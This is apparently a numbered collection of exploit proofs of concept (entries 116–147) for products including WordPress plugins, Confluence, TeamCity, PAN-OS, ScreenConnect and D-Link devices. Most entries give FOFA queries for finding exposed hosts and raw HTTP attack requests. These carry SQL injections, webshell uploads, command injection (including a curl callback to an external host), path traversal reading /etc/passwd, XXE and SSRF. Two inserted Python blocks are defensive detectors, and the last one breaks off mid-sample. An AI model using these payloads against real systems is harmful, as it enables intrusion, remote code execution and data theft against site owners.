Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default username and password are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter carries a base64-encoded (not encrypted) SQL statement: sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

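Added example for entry 123 (my code, not from the original write-up or from Atlassian): the PoC body hides its OGNL behind two encodings, form percent-encoding and Java \uXXXX escapes, so matching the raw body for `#request` or `findValue` misses it. The function below peels both layers and reports the OGNL/Struts markers it finds in a POST to a .vm endpoint. The marker list and the two sample requests (built from the PoC above, payload kept as-is) are my own constructions, not a vendor signature.

```python
import re
from urllib.parse import unquote, unquote_plus

# Tokens that belong to an OGNL/Struts expression, not to a Velocity template
# parameter. Assumed marker list for this example, not a vendor signature.
OGNL_MARKERS = (
    "#request",
    "KEY_velocity.struts2.context",
    ".internalGet(",
    ".findValue(",
    "@org.apache.struts2.",
    "freemarker.template.utility.Execute",
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",
)

_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def decode_layers(value: str, rounds: int = 3) -> str:
    """Peel the encodings the PoC relies on: form percent-encoding once
    ('+' means space there), then a bounded number of extra percent and
    Java \\uXXXX unescape rounds to catch double encoding."""
    value = unquote_plus(value)
    for _ in range(rounds):
        new = _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), unquote(value))
        if new == value:
            break
        value = new
    return value


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, val = line.partition(":")
        headers[name.strip().lower()] = val.strip()
    return method, target, headers, body


def ognl_findings(raw_request: str) -> list:
    """Markers found in the decoded body of a POST to a .vm endpoint;
    an empty list means nothing suspicious."""
    method, target, _, body = parse_request(raw_request)
    if method != "POST" or not target.split("?", 1)[0].endswith(".vm"):
        return []
    decoded = decode_layers(body)
    return [m for m in OGNL_MARKERS if m in decoded]


# Constructed sample requests: the first mirrors the PoC body in entry 123,
# the second is a benign template parameter.
SAMPLE_ATTACK = (
    "POST /template/aui/text-inline.vm HTTP/1.1\r\n"
    "Host: localhost:8090\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d"
    ".internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027"
    "&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader("
    "'X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({\"id\"}))"
)
SAMPLE_BENIGN = (
    "POST /template/aui/text-inline.vm HTTP/1.1\r\n"
    "Host: localhost:8090\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "label=Hello+World"
)

if __name__ == "__main__":
    print(decode_layers(parse_request(SAMPLE_ATTACK)[3]))
    print(ognl_findings(SAMPLE_ATTACK))
    print(ognl_findings(SAMPLE_BENIGN))
```

A WAF rule that matches only one of the two encodings is bypassable by switching to the other; decoding both before matching is what makes the check hold.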
124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then served at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; system commands can be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 Update 17 and earlier, 2021 Update 7 and earlier, 2023 Update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, passing the uuid as a header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection (time-based, in the orderBy parameter)
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199 (path traversal to authenticated pages, same versions)
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communications command and dispatch platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak default credentials
CVE-2024-29666
FOFA:body="/808gps/"
Credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id)
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-host>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
The transport parameter is URL-encoded; it decodes to: || (echo '[S]'; id; echo '[E]')#;
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

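Added example covering entries 126, 129, 132 (CVE-2024-27199), 145 and 147 above (my code, not from the original post or from any of the affected vendors). All five move a `..` segment through a different carrier: the URL path, a query value, or a cookie. The detector below percent-decodes each carrier a bounded number of times, flags dot-segments, and reports where the value resolves to, because that resolved path (not the raw string) is what an authorization check has to be applied to. The sample requests are constructed from the PoCs; hostnames and the callback name are placeholders.

```python
import posixpath
from urllib.parse import unquote, urlsplit


def _decode(value: str, rounds: int = 3) -> str:
    """Percent-decode a bounded number of times so %2e%2e%2f and double-encoded
    forms are seen as the path they become server-side; treat '\\' as '/'."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value.replace("\\", "/")


def has_dot_segments(value: str) -> bool:
    """True if the decoded value contains a '..' path segment."""
    return ".." in _decode(value).split("/")


def resolve(value: str) -> str:
    """Where the value lands once dot-segments are applied, anchored at '/'.
    posixpath.normpath clamps at the root, as most servers do, which is why
    the raw value (not this result) is the evidence of traversal."""
    value = _decode(value)
    if not value.startswith("/"):
        value = "/" + value
    return posixpath.normpath(value)


def _query_pairs(query: str) -> list:
    """Split a query string on '&' only; '=' inside a value is kept."""
    pairs = []
    for field in query.split("&"):
        if field:
            name, _, val = field.partition("=")
            pairs.append((name, val))
    return pairs


def _cookie_pairs(header_value: str) -> list:
    pairs = []
    for item in header_value.split(";"):
        item = item.strip()
        if item:
            name, _, val = item.partition("=")
            pairs.append((name.strip(), val.strip()))
    return pairs


def traversal_findings(raw_request: str) -> list:
    """Return (location, raw value, resolved path) for every part of the
    request that carries dot-segments: the path, query values, cookie values.
    Alert on the raw value; authorize against the resolved path."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    target = request_line.split(" ", 2)[1]
    parts = urlsplit(target)
    findings = []
    if has_dot_segments(parts.path):
        findings.append(("path", parts.path, resolve(parts.path)))
    for name, val in _query_pairs(parts.query):
        if has_dot_segments(val):
            findings.append(("query:" + name, val, resolve(val)))
    for line in header_lines:
        hname, _, hval = line.partition(":")
        if hname.strip().lower() != "cookie":
            continue
        for name, val in _cookie_pairs(hval):
            if has_dot_segments(val):
                findings.append(("cookie:" + name, val, resolve(val)))
    return findings


# Constructed sample requests modelled on entries 126, 132, 129, 145 and 147
# above (callback host replaced by a reserved name), plus a benign request.
SAMPLES = {
    "aiohttp": "GET /static/../../../../../etc/passwd HTTP/1.1\r\nHost: x.x.x.x\r\n\r\n",
    "teamcity": "GET /res/../admin/diagnostic.jsp HTTP/1.1\r\nHost: x.x.x.x\r\n\r\n",
    "coldfusion": ("GET /pms?module=logging&file_name=../../../../../../../etc/passwd"
                   "&number_of_lines=100 HTTP/1.1\r\nHost: x.x.x.x\r\n"
                   "uuid: 85f60018-a654-4410-a783-f81cbd5000b9\r\n\r\n"),
    "panos": ("GET /global-protect/login.esp HTTP/1.1\r\nHost: x.x.x.x\r\n"
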